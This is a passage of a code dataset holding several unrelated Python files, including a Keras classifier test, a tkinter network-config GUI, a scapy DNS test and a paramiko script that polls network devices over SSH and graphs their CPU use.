plsa_grass[np.random.randint(0,grassN-1,grassN)][:]\n    alloc = list(np.vstack((alloc_grass, alloc_wood)))\n    # COMBINATIONS\n    # Random samples from beta distributions (g1, tleaf ...)\n    # The sampling is done via indexation of beta distributions\n    # with random integers from a discrete uniform distribution\n\n\n    # ! 
['g1','vcmax','tleaf','twood','troot','aleaf','awood','aroot']\n\n colnames = ['g1','vcmax','tleaf','twood','troot'] + colnames_a\n tau_leaf = list(tleaf[np.random.randint(0,9999,N)][:])\n tau_root = list(troot[np.random.randint(0,9999,N)][:])\n tau_wood = list(twood[np.random.randint(0,9999,N)][:])\n g1_pls = list(g1[np.random.randint(0,9999,N)][:])\n vcmax_pls = list(vcmax[np.random.randint(0,9999,N)][:])\n jmax_pls = list(jmax[np.random.randint(0,9999,N)][:])\n zero = np.zeros(1)\n pls_table = []\n for i in range(len(alloc)):\n if i < grassN:\n aux_arr = np.array([g1_pls[i],vcmax_pls[i],tau_leaf[i],list(zero)[0],tau_root[i]])\n pls = np.hstack((aux_arr,alloc[i]))\n else:\n aux_arr = np.array([g1_pls[i],vcmax_pls[i],tau_leaf[i],tau_wood[i],tau_root[i]])\n pls = np.hstack((aux_arr,alloc[i]))\n\n pls_table.append(pls)\n \n #pls_table = np.array(pls_table,np.float32)\n\n\n with open('pls_attrs.csv', mode='w') as fh:\n writer = csv.writer(fh, delimiter=',')\n writer.writerow(colnames)\n writer.writerows(pls_table)\n \n out_arr = np.array(pls_table,np.float32).T\n np.savetxt('pls.txt', out_arr, fmt='%.12f')\n \n\n","sub_path":"CAETE/src_5backup/plsgen.py","file_name":"plsgen.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611086596","text":"import pyglet\n\nwindow = pyglet.window.Window()\nimage = pyglet.resource.image('pyglet.png')\n\n@window.event\ndef on_draw(): # The only event handle so far.\n window.clear()\n image.blit(100, 100)\n\npyglet.app.run() # always need the run","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"123500973","text":"# Copyright 2018 Davide Spadini\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom _datetime import datetime\nfrom typing import List\nfrom pydriller.domain.developer import Developer\nfrom pydriller.domain.modification import Modification, ModificationType\n\n\nclass Commit:\n def __init__(self, hash: str, author: Developer, committer: Developer,\n author_date: datetime, committer_date: datetime,\n author_timezone: int, committer_timezone: int,\n msg: str, parents: List[str], merge: bool = False, branches: set = set(),\n is_commit_in_main_branch: bool = False) -> None:\n \"\"\"\n Create a commit object.\n\n :param str hash: hash of the commit\n :param Developer author: author of the commit\n :param Developer committer: committer of the commit\n :param datetime author_date: date when the author committed\n :param datetime committer_date: date when the committer committed\n :param int author_timezone: seconds west from UTC\n :param int committer_timezone: seconds west from UTC\n :param str msg: message of the commit\n :param List[str] parents: list of hashes of the parent commits\n :param bool merge: True if the commit is a merge commit\n :param set branches: branches that include the commit\n :param bool 
is_commit_in_main_branch: True if the commit is in the main branch\n \"\"\"\n self.hash = hash\n self.author = author\n self.committer = committer\n self.author_date = author_date\n self.committer_date = committer_date\n self.author_timezone = author_timezone\n self.committer_timezone = committer_timezone\n self.msg = msg\n self.parents = parents\n self.merge = merge\n self.modifications = [] # type: List[Modification]\n self.branches = branches\n self.in_main_branch = is_commit_in_main_branch\n\n def add_modifications(self, old_path: str, new_path: str, change: ModificationType, diff: str, sc: str):\n \"\"\"\n Add a modification to the commit.\n\n :param str old_path: old path of the file (can be null if the file is added)\n :param str new_path: new path of the file (can be null if the file is deleted)\n :param ModificationType change: type of the change\n :param str diff: diff of the change\n :param str sc: source code of the file (can be null if the file is deleted)\n \"\"\"\n m = Modification(old_path, new_path, change, diff, sc)\n self.modifications.append(m)\n\n def __eq__(self, other):\n if not isinstance(other, Commit):\n return NotImplemented\n elif self is other:\n return True\n else:\n return self.__dict__ == other.__dict__\n\n def __str__(self):\n return ('Hash: {}'.format(self.hash) + '\\n'\n 'Author: {}'.format(self.author.name) + '\\n'\n 'Author email: {}'.format(self.author.email) + '\\n'\n 'Committer: {}'.format(self.committer.name) + '\\n'\n 'Committer email: {}'.format(self.committer.email) + '\\n'\n 'Author date: {}'.format(self.author_date.strftime(\"%Y-%m-%d %H:%M:%S\")) + '\\n'\n 'Committer date: {}'.format(self.committer_date.strftime(\"%Y-%m-%d %H:%M:%S\")) + '\\n'\n 'Message: {}'.format(self.msg) + '\\n'\n 'Parent: {}'.format(\"\\n\".join(map(str, self.parents))) + '\\n'\n 'Merge: {}'.format(self.merge) + '\\n'\n 'Modifications: \\n{}'.format(\"\\n\".join(map(str, self.modifications))) + '\\n'\n 'Branches: \\n{}'.format(\"\\n\".join(map(str, self.branches))) + '\\n'\n 'In main branch: {}'.format(self.in_main_branch)\n )\n\n\nclass ChangeSet:\n def __init__(self, id: str, date: datetime):\n \"\"\"\n Light-weight version of the commit, storing only the hash and the date. 
Used to filter out\n commits before asking for more complex information (like diff and source code).\n\n :param str id: hash of the commit\n :param date: date of the commit\n \"\"\"\n self.id = id\n self.date = date\n\n def __eq__(self, other):\n if not isinstance(other, ChangeSet):\n return NotImplemented\n elif self is other:\n return True\n else:\n return self.__dict__ == other.__dict__","sub_path":"pydriller/domain/commit.py","file_name":"commit.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"103020520","text":"import tkinter as tk\n\nclass MainMenu(tk.Tk):\n def __init__(self):\n super().__init__()\n\n self.title(\"PyConfig v.0.1\")\n self.geometry(\"400x400\")\n\n # Label on top and bottom\n self.header_label = tk.Label(self, text=\"--- Config Application ---\", bg=\"lightgrey\", fg=\"black\", pady=10)\n self.header_label.pack(side=tk.TOP, fill=tk.X)\n\n self.footer_label = tk.Label(self, text=\"Author: Sebastian Röhl, Version: 0.1\", fg=\"black\", pady=10)\n self.footer_label.pack(side=tk.BOTTOM, fill=tk.X)\n\n # Buttons\n self.create_new_button = tk.Button(self, text=\"Create New\", pady=10, padx=10, command=self.open_create_window)\n self.create_new_button.pack(side=tk.TOP,fill=tk.X)\n\n self.load_existing_button = tk.Button(self, text=\"Load Existing\", pady=10, padx=10)\n self.load_existing_button.pack(side=tk.TOP, fill=tk.X)\n\n self.exit_button = tk.Button(self, text=\"Quit\", pady=10, padx=10, command=self.quit)\n self.exit_button.pack(side=tk.TOP, fill=tk.X)\n\n def open_create_window(self):\n CreateNewWindow(self)\n\n\nclass CreateNewWindow(tk.Toplevel):\n def __init__(self, master):\n super().__init__()\n\n self.master = master\n\n self.title(\"PyConfig v.0.1\")\n self.geometry(\"800x600\")\n\n # Sections displayed in the left frame\n self.sections = [\"General\", \"Router\", \"Interfaces\", \"VLANS\"]\n\n # Creating the menu and binding the shortcuts\n self.menubar = tk.Menu(self, bg=\"lightgrey\", fg=\"black\")\n\n self.file_menu = tk.Menu(self.menubar, tearoff=0, bg=\"lightgray\", fg=\"black\")\n self.file_menu.add_command(label=\"Open\", command=self.file_open, accelerator=\"Ctrl+O\")\n self.file_menu.add_command(label=\"Save\", command=self.file_save, accelerator=\"Ctrl+S\")\n self.file_menu.add_command(label=\"Export\", command=self.file_export, accelerator=\"Ctrl+E\")\n\n self.menubar.add_cascade(label=\"File\", menu=self.file_menu)\n self.config(menu=self.menubar)\n\n self.bind(\"<Control-o>\", self.file_open)\n self.bind(\"<Control-s>\", self.file_save)\n self.bind(\"<Control-e>\", self.file_export)\n\n # Left frame for showing the different configuration sections\n self.left_frame = tk.Frame(self, width=200, height=600, bg=\"grey\")\n self.left_frame.pack_propagate(0)\n\n self.section_select = tk.Listbox(self.left_frame, width=200, height=600, selectmode=tk.SINGLE, bg=\"grey\", fg=\"white\")\n self.section_select.configure(exportselection=False)\n self.section_select.pack(expand=1)\n for index, item in enumerate(self.sections):\n self.section_select.insert(index, item)\n self.section_select.bind(\"<<ListboxSelect>>\", self.display_section_content)\n\n # Right frame for showing the specific configuration details\n self.right_frame = tk.Frame(self, width=600, height=600, bg=\"lightgrey\", padx=20, pady=20)\n self.right_frame.pack_propagate(0)\n\n # Pack the two frames\n self.left_frame.pack(side=tk.LEFT, fill=tk.BOTH)\n self.right_frame.pack(side=tk.LEFT, expand=1, fill=tk.BOTH)\n\n def file_open(self, 
event=None):\n print(\"Open File\")\n\n def file_save(self, event=None):\n print(\"Save File\")\n\n def file_export(self, event=None):\n print(\"Export File\")\n\n # Change content of the right frame when clicking different sections\n def display_section_content(self, event=None):\n selected_element = self.section_select.get(self.section_select.curselection())\n self.clear_right_frame()\n if selected_element == \"General\":\n self.render_general_frame()\n elif selected_element == \"Router\":\n self.render_router_frame()\n elif selected_element == \"Interfaces\":\n self.render_interfaces_frame()\n elif selected_element == \"VLANS\":\n self.render_vlans_frame()\n\n # Clear the right frame before changing the selection\n def clear_right_frame(self):\n for child in self.right_frame.winfo_children():\n child.destroy()\n\n def render_general_frame(self):\n print(\"render general\")\n\n # Host Name\n hostname_label = tk.Label(self.right_frame, text=\"Host Name:\", font=(None, 10), bg=\"black\", fg=\"white\")\n hostname_label.pack(fill=tk.X, side=tk.TOP, pady=(10,0))\n hostname_entry = tk.Entry(self.right_frame, bg=\"white\", fg=\"black\", justify=\"center\")\n hostname_entry.pack(fill=tk.X, side=tk.TOP, pady=(10,0))\n\n # IP Address\n ipaddress_label = tk.Label(self.right_frame, text=\"IP Address:\", font=(None, 10), bg=\"black\", fg=\"white\")\n ipaddress_label.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n ipaddress_entry = tk.Entry(self.right_frame, bg=\"white\", fg=\"black\", justify=\"center\")\n ipaddress_entry.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n\n # Subnet Mask\n subnet_label = tk.Label(self.right_frame, text=\"Subnet Mask:\", font=(None, 10), bg=\"black\", fg=\"white\")\n subnet_label.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n subnet_entry = tk.Entry(self.right_frame, bg=\"white\", fg=\"black\", justify=\"center\")\n subnet_entry.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n\n # Default Gateway\n default_gateway_label = tk.Label(self.right_frame, text=\"Default Gateway:\", font=(None, 10), bg=\"black\", fg=\"white\")\n default_gateway_label.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n default_gateway_entry = tk.Entry(self.right_frame, bg=\"white\", fg=\"black\", justify=\"center\")\n default_gateway_entry.pack(fill=tk.X, side=tk.TOP, pady=(10, 0))\n # Admin VLAN?\n\n save_button = tk.Button(self.right_frame, text=\"Save Changes\", command=self.file_save)\n save_button.pack(side=tk.BOTTOM, pady=(0, 20))\n\n def render_router_frame(self):\n print(\"render router\")\n\n # Switch Type\n # Catalog Number\n # Description\n # EthernetPorts\n # GigabitPorts\n\n save_button = tk.Button(self.right_frame, text=\"Save Changes\", command=self.file_save)\n save_button.pack(side=tk.BOTTOM, pady=(0, 20))\n\n def render_interfaces_frame(self):\n print(\"render interfaces\")\n\n # Port\n # Interface\n # Access VLAN\n\n save_button = tk.Button(self.right_frame, text=\"Save Changes\", command=self.file_save)\n save_button.pack(side=tk.BOTTOM, pady=(0, 20))\n\n def render_vlans_frame(self):\n print(\"render vlan\")\n\n # VLAN\n # ID\n # Name\n # IP Address\n # Subnet Mask\n\n save_button = tk.Button(self.right_frame, text=\"Save Changes\", command=self.file_save)\n save_button.pack(side=tk.BOTTOM, pady=(0, 20))\n\n\nif __name__ == \"__main__\":\n mainMenu = MainMenu()\n mainMenu.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"132452669","text":"import 
keras\nimport numpy as np\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.optimizers import SGD, RMSprop, Adam\nfrom keras.regularizers import l2\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.callbacks import ModelCheckpoint, Callback \n\nstr_index = 'ABCDEFGH'\n\ntest_data_dir = 'test'\nnb_test_samples = 10\nnb_classes = 8\n\nimg_width, img_height = 28, 28\n\nmodel = Sequential()\nmodel.add(Convolution2D(32, 5, 5, input_shape=(img_width, img_height, 1)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(64, 5, 5))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(1024))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes, W_regularizer=l2(0.01)))\nmodel.add(Activation('softmax'))\n\nmodel.load_weights('best.h5')\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntest_generator = test_datagen.flow_from_directory(\n test_data_dir,\n target_size=(img_width, img_height),\n batch_size=1,\n shuffle=False,\n color_mode='grayscale',\n class_mode=None)\n\noutput_arr = model.predict_generator(test_generator, nb_test_samples)\n\nf = open('LetterCNN[12300120012].txt', 'w') \nf.truncate()\n\nfor output in output_arr:\n\tmax_index = np.argmax(output)\n\tf.write(str_index[max_index] + '\\n')\n\nf.close()","sub_path":"test_cnn.py","file_name":"test_cnn.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"124431937","text":"from pyadh import *\nfrom pyadh.default_n import *\nfrom curvature_sloshbox_2d_p import *\nfrom sloshbox import *\n\ntimeIntegration = NoIntegration\n#timeIntegration = PsiTCtte\ntimeIntegrator = SteadyStateIntegrator\n#DT = None\n\nfemSpaces = {0:C0_AffineLinearOnSimplexWithNodalBasis}\n#femSpaces = {0:DG_AffineP0_OnSimplexWithMonomialBasis}\n\nelementQuadrature = SimplexGaussQuadrature(nd,sloshbox_quad_order)\n\nelementBoundaryQuadrature = SimplexGaussQuadrature(nd-1,sloshbox_quad_order)\n\n#elementQuadrature = SimplexLobattoQuadrature(nd,1)\n#\n#elementBoundaryQuadrature = SimplexLobattoQuadrature(nd-1,1)\n\nsubgridError = None\nshockCapturing = None\nmassLumping = False\nreactionLumping=False\nnumericalFluxType = None\n#numericalFluxType = Advection_Diagonal_average\n#numericalFluxType = Advection_DiagonalUpwind_Diffusion_IIPG_exterior\nnumericalFluxType = Curvature_exterior\nmultilevelNonlinearSolver = Newton\nfullNewtonFlag = False\ntolFac = 0.0\natol = 0.001*he#1.0e-8 #1e-4\nmaxNonlinearIts = 100\nmatrix = SparseMatrix\nmultilevelLinearSolver = LU\nlevelLinearSolver = LU\nif usePETSc:\n multilevelLinearSolver = PETSc\n levelLinearSolver = PETSc\n nLayersOfOverlapForParallel = 2\n parallelPartitioningType = MeshParallelPartitioningTypes.node\n #parallelPartitioningType = MeshParallelPartitioningTypes.element\n\nlinTolFac = 0.001\nconservativeFlux = None\n","sub_path":"curvature_sloshbox_2d_c0p1_n.py","file_name":"curvature_sloshbox_2d_c0p1_n.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"301803835","text":"from __future__ import unicode_literals\nfrom django import forms\n\nfrom symposion.speakers.models import Speaker\n\n\nclass 
SpeakerForm(forms.ModelForm):\n required_css_class = \"formfield-required\"\n\n class Meta:\n model = Speaker\n fields = [\n \"name\",\n \"biography\",\n \"photo\",\n \"github_username\",\n \"twitter_username\",\n ]\n\n def clean_twitter_username(self):\n value = self.cleaned_data[\"twitter_username\"]\n if value.startswith(\"@\"):\n value = value[1:]\n return value\n","sub_path":"symposion/speakers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"176815800","text":"#!/usr/bin/env python\n\nimport sys\nfrom scapy.all import *\nimport helper\nimport logging\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.WARNING)\n\n\ndef main():\n\n udp_packet = IP() / UDP(dport=53) / DNS(qd=DNSQR(qname=\"google.com\"))\n udp_re_output = \"\"\n udp_retcode = helper.chck(udp_packet, udp_re_output)\n\n tcp_packet = TCP(dport=53)\n tcp_re_output = \"\"\n tcp_retcode = helper.chck(tcp_packet, tcp_re_output)\n\n if tcp_retcode and udp_retcode:\n sys.exit(0)\n else:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n\n main()\n","sub_path":"tests/regress/tcpdump/proto_domain.py","file_name":"proto_domain.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"133943360","text":"# --------------------------------------------------------------------------\r\n# Copyright (c) <2017> \r\n# BE-BI-PM, CERN (European Organization for Nuclear Research)\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n# --------------------------------------------------------------------------\r\n#\r\n# Not fully documented\r\n\r\n\r\nfrom __future__ import unicode_literals\r\n\r\nimport os\r\nimport numpy as np\r\nimport scipy.io as sio\r\n\r\nfrom PyQt5 import QtCore\r\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout\r\nfrom matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar\r\n\r\nfrom lib import prairie\r\nfrom lib import utils\r\nfrom gui.mplCanvas import mplCanvas\r\n\r\n\r\nclass QTabMultipleResidualsShape(QWidget):\r\n\r\n def __init__(self, parent=None):\r\n\r\n super(QTabMultipleResidualsShape, self).__init__(parent=None)\r\n\r\n self.setAttribute(QtCore.Qt.WA_DeleteOnClose)\r\n\r\n self.main_widget = QWidget(self)\r\n\r\n self.in_or_out = 'IN'\r\n self.folders = []\r\n\r\n main_layout = QVBoxLayout(self.main_widget)\r\n self.plot = plot(self.main_widget, width=6.5, height=6, dpi=100)\r\n self.navi_toolbar = NavigationToolbar(self.plot, self)\r\n main_layout.addWidget(self.navi_toolbar)\r\n main_layout.addWidget(self.plot)\r\n\r\n self.setLayout(main_layout)\r\n\r\n def set_folder(self, folders, in_or_out):\r\n self.folders = folders\r\n self.in_or_out = in_or_out\r\n self.plot.folders = folders\r\n self.plot.in_or_out = in_or_out\r\n self.plot.compute_initial_figure()\r\n self.plot.draw()\r\n\r\nclass plot(mplCanvas):\r\n \"\"\"Simple canvas with a sine plot.\"\"\"\r\n\r\n def __init__(self, parent, width, height, dpi):\r\n\r\n self.folders = []\r\n\r\n self.ax1 = 0\r\n\r\n self.in_or_out = 'IN'\r\n\r\n super(plot, self).__init__(parent, width, height, dpi)\r\n\r\n def compute_initial_figure(self):\r\n\r\n self.fig.clear()\r\n\r\n prairie.use()\r\n ax1 = self.fig.add_subplot(2, 1, 1)\r\n ax3 = self.fig.add_subplot(2, 1, 2)\r\n residuals_IN = []\r\n residuals_OUT = []\r\n laser_position_IN = []\r\n laser_position_OUT = []\r\n\r\n for folder in self.folders:\r\n\r\n if os.path.exists(folder + '/calibration_results.mat'):\r\n\r\n color = int(folder.split('/')[::-1][0].split('__')[1].split('_')[2])\r\n\r\n if int(folder.split('/')[::-1][0].split('__')[2].split('_')[0]) >= 12:\r\n color += 0.5\r\n\r\n data = sio.loadmat(folder + '/' + 'calibration_results.mat', struct_as_record=False, squeeze_me=True)\r\n residuals_IN.append(data['residuals_IN_origin_mean'])\r\n residuals_OUT.append(data['residuals_OUT_origin_mean'])\r\n laser_position_IN.append(data['laser_position_IN_mean'])\r\n laser_position_OUT.append(data['laser_position_OUT_mean'])\r\n\r\n if len(self.folders) > 1:\r\n\r\n M = []\r\n\r\n for residuals, laser_position in zip(residuals_IN, laser_position_IN):\r\n ax1.plot(laser_position, utils.butter_lowpass_filter(residuals, 1 / 101, 1 / 10) - np.mean(residuals),\r\n alpha=0.2, linewidth=2, label='_nolegend_')\r\n M.append(residuals)\r\n\r\n M = np.asarray(M)\r\n M = np.mean(M, 0)\r\n\r\n ax1.plot(laser_position, utils.butter_lowpass_filter(M, 1 / 101, 1 / 10), color='k', linewidth=2.5,\r\n label='Mean residual profile')\r\n ax1.set_xlabel('Laser position (mm)')\r\n ax1.set_ylabel('Residual error (\\u03BCm)')\r\n ax1.legend()\r\n prairie.style(ax1)\r\n\r\n M = []\r\n\r\n for residuals, laser_position in zip(residuals_OUT, laser_position_OUT):\r\n ax3.plot(laser_position, 
utils.butter_lowpass_filter(residuals, 1 / 101, 1 / 10) - np.mean(residuals),\r\n alpha=0.2, linewidth=2, label='_nolegend_')\r\n M.append(residuals)\r\n\r\n M = np.asarray(M)\r\n M = np.mean(M, 0)\r\n\r\n ax3.plot(laser_position, utils.butter_lowpass_filter(M, 1 / 101, 1 / 10), color='k', linewidth=2.5,\r\n label='Mean residual profile')\r\n ax3.set_xlabel('Laser position (mm)')\r\n ax3.set_ylabel('Residual error (\\u03BCm)')\r\n ax3.legend()\r\n prairie.style(ax3)","sub_path":"gui/QTabMultipleResidualsShape.py","file_name":"QTabMultipleResidualsShape.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"177019440","text":"#!/usr/bin/python3\n\n\ndef divisible_by_2(my_list=[]):\n\n lst = []\n\n for i in range(0, len(my_list)):\n if my_list[i] % 2 == 0:\n lst.append(True)\n\n else:\n lst.append(False)\n\n return lst\n","sub_path":"0x03-python-data_structures/10-divisible_by_2.py","file_name":"10-divisible_by_2.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479939506","text":"from goto import with_goto\n\n@with_goto\ndef ejecutar():\n t1 = 2 * 2\n t2 = 5 #base potencia\n t3 = 1 #contador de potencia\n label .L3\n if(t3 < t1):\n goto .L1\n\n goto .L2\n label .L1\n t2 = t2 * 5\n t3 = t3+ 1\n goto .L3\n label .L2\n\n \n print('resultado = ' + str(t2))\n\n\nejecutar()","sub_path":"parser/fase2/team09/Instrucciones/C3D/c3d.py","file_name":"c3d.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"85051480","text":"import sys\r\nimport os.path\r\nimport time\r\nimport datetime\r\nimport subprocess\r\nimport paramiko\r\nimport re\r\nimport threading\r\n\r\nimport matplotlib.pyplot as pyp\r\nimport matplotlib.animation as animation\r\n\r\ndef ip_file_valid():\r\n\r\n while True:\r\n ip_file = input(\"\\nEnter full path and name of IP file: \")\r\n if os.path.isfile(ip_file) == True:\r\n print('\\nFile {} exists\\n'.format(ip_file))\r\n break\r\n else:\r\n print('Invalid path or filename!\\nPlease try again')\r\n continue\r\n\r\n ip = open(ip_file, 'r')\r\n ip.seek(0)\r\n ip_list = ip.readlines()\r\n ip.close()\r\n return ip_list\r\n \r\n#############################################################\r\n\r\ndef ip_addr_valid(ip_list):\r\n for ip in ip_list:\r\n ip = ip.rstrip('\\n')\r\n ip_octets = ip.split('.')\r\n if (len(ip_octets ) == 4) and (int(ip_octets[0]) != 127) and (1 <= int(ip_octets[0]) <= 223) and (int(ip_octets[0]) != 169 or int(ip_octets[0]) != 254) and (0 <= int(ip_octets[1]) <= 255 and 0 <= int(ip_octets[2]) <= 255 and 0 <= int(ip_octets[3]) <= 255):\r\n continue\r\n else:\r\n print('There was an invalid IP address in file: {}'.format(ip))\r\n sys.exit()\r\n\r\n###################################################################\r\n\r\ndef ip_reach(iplist):\r\n for ip in iplist:\r\n ip = ip.rstrip('\\n')\r\n\r\n ping_reply = subprocess.call('ping %s /n 2' %(ip), stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)\r\n if ping_reply == 0:\r\n print('\\n *{} is reachable \\n'.format(ip))\r\n\r\n else:\r\n print('\\n Sorry, {} is not reachable :( Check connectivity and try again \\n'.format(ip))\r\n sys.exit()\r\n\r\n########################################################################\r\n\r\nwhile True:\r\n\r\n userfile = input('\\nEnter full path for a user file: ')\r\n if 
os.path.isfile(userfile) == True:\r\n print(\"\\n{} file exists\".format(userfile))\r\n break\r\n\r\n else:\r\n print(\"\\n{} file does not exist. Please check full path and try again.\\n\".format(userfile))\r\n\r\n\r\n \r\nwhile True:\r\n\r\n cmdfile = input('\\nEnter full path for a cmd file: ')\r\n if os.path.isfile(cmdfile) == True:\r\n print(\"\\n{} file exists\".format(cmdfile))\r\n break\r\n\r\n else:\r\n print(\"\\n{} file does not exist. Please check full path and try again.\\n\".format(cmdfile))\r\n \r\ndef ssh_connection(ip):\r\n try:\r\n \r\n global cmdfile\r\n global userfile\r\n \r\n user_file = open(userfile, 'r')\r\n user_file.seek(0)\r\n username = user_file.readlines()[0].split(',')[0].rstrip('\\n')\r\n user_file.seek(0)\r\n password = user_file.readlines()[0].split(',')[1].rstrip('\\n')\r\n user_file.close()\r\n \r\n session = paramiko.SSHClient()\r\n \r\n session.set_missing_host_key_policy(paramiko.AutoAddPolicy)\r\n \r\n session.connect(ip.rstrip('\\n'), username = username, password = password)\r\n \r\n connection = session.invoke_shell()\r\n \r\n \r\n connection.send('enable\\n')\r\n connection.send('terminal length 0\\n')\r\n time.sleep(1)\r\n \r\n cmd_file = open(cmdfile, 'r')\r\n cmd_file.seek(0)\r\n \r\n for command in cmd_file.readlines():\r\n connection.send(command.rstrip('\\n') + '\\n')\r\n time.sleep(2)\r\n \r\n cmd_file.close()\r\n \r\n output = connection.recv(65535)\r\n \r\n if re.search(b'% Invalid input', output):\r\n print('\\nThere was at least one IOS syntax error on device {}'.format(ip))\r\n \r\n else: \r\n print(\"Done for a device {}\\nData sent to file at {}\\n\\n\".format(ip, str(datetime.datetime.now())))\r\n \r\n cpu = re.search(b\"%Cpu\\(s\\):(\\s)+(.+?)(\\s)* us,\", output)\r\n utilization = cpu.group(2).decode('utf-8')\r\n \r\n with open(\"D:\\\\netapp\\\\3_build_graph\\\\cpu.txt\", 'a') as f:\r\n f.write(utilization + '\\n')\r\n \r\n \r\n except paramiko.AuthenticationException:\r\n print('* Invalid username or password \\n Please check username/password file and device configuration.\\n')\r\n print('* Closing program... 
Bye!')\r\n\r\n######################################################################################\r\n\r\ndef create_threads(iplist, function):\r\n threads = []\r\n for ip in iplist:\r\n th = threading.Thread(target = function, args = (ip,))\r\n th.start()\r\n threads.append(th)\r\n\r\n for th in threads:\r\n th.join()\r\n \r\n#################################################################################\r\n\r\nip_list = ip_file_valid()\r\n\r\ntry:\r\n ip_addr_valid(ip_list)\r\nexcept KeyboardInterrupt:\r\n print(\"Program was aborted by user!\")\r\n sys.exit()\r\n\r\ntry:\r\n ip_reach(ip_list)\r\nexcept KeyboardInterrupt:\r\n print(\"Program was aborted by user!\")\r\n sys.exit()\r\n\r\nwhile True:\r\n create_threads(ip_list, ssh_connection)\r\n time.sleep(10)\r\n \r\n #Creating new figure\r\n figure = pyp.figure()\r\n figure.clear()\r\n\r\n #Creating subplot with 1 row, 1 column, and index 1 meaning single subplot\r\n subplot = figure.add_subplot(1, 1, 1)\r\n subplot.clear()\r\n\r\n def animation_function(i):\r\n\r\n cpu_data = open(\"D:\\\\netapp\\\\3_build_graph\\\\cpu.txt\").readlines()\r\n\r\n x = []\r\n\r\n for each_value in cpu_data:\r\n if len(each_value) > 1:\r\n x.append(float(each_value))\r\n\r\n #Clearing/Refreshing the figure to avoid overwriting for each new poll (every 10 seconds)\r\n subplot.clear()\r\n\r\n #Plotting the values in the list\r\n subplot.plot(x)\r\n\r\n #Using the figure, the function and polling interval of 10000ms (10 seconds) to build the graph\r\n graph_animation = animation.FuncAnimation(figure, animation_function, interval = 10000)\r\n\r\n #Displaying the graph on the screen\r\n pyp.show()\r\n\r\n ","sub_path":"in_one.py","file_name":"in_one.py","file_ext":"py","file_size_in_byte":5994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"296697646","text":"'''\nRestaurante Ean\n'''\nimport datetime\nfrom typing import Iterator\n\n# Get the current weekday: 